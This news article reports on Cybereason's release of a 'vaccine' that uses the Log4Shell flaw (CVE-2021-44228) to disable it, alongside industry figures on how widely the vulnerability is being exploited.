Researchers at Massachusetts-based cybersecurity company Cybereason have developed and released (on GitHub) a fix that will disable the Apache Log4Shell vulnerability (CVE-2021-44228).
Log4Shell is a remote code execution (RCE) vulnerability that was detected early this month in Apache Log4j version 2, an open-source Java logging library that is used in one-third of all web servers across the world. The vulnerability affects all major applications and cloud service providers.
Cybereason is calling the fix a “vaccine” to highlight the fact that it uses the vulnerability to mitigate it, in the same way, a vaccine develops immunity by imitating the infection. “Because the vulnerability is so easy to exploit and so ubiquitous—it's one of the very few ways to close it in certain scenarios,” Yonatan Striem-Amit, CTO, co-founder Cybereason wrote in a blog post.
“You can permanently close the vulnerability by causing the server to save a configuration file, but that can be difficult. The simplest solution is to set up a server that will download and then run a class that changes the server's configuration to not load things anymore,” he added.
Striem-Amit also clarified that the fox developed by his company is not a patch and said companies will still have to update their Apache systems to permanently address the vulnerability.
However, “patching takes time, and some systems may not be able to be updated immediately—or at all,” he warned. According to Striem-Amit, the fix will disable the vulnerability and buy organisations more time to assess and update their servers.
Security experts have given Log4Shell the severity rating of 10, which makes it highly dangerous.
The vulnerability allows attackers to take control over any Java-based web server and execute RCE attacks. According to security experts, the vulnerability can be exploited by sending a malicious code string that gets logged by Log4j.
Though initially the vulnerability was exploited for crypto mining, it is now being used to target organisations. According to cybersecurity company Check Point, out of the 820 attempted exploits on the vulnerability that they have prevented, 46% were made by known malicious groups.
They also detected an attempted exploit on more than 36.8% of corporate networks globally.
Microsoft's findings show that the majority of attacks detected by them were related to mass scanning by attackers in an attempt to identify vulnerable systems.
Microsoft also found that attackers have started using obfuscation techniques to avoid detections based on request patterns.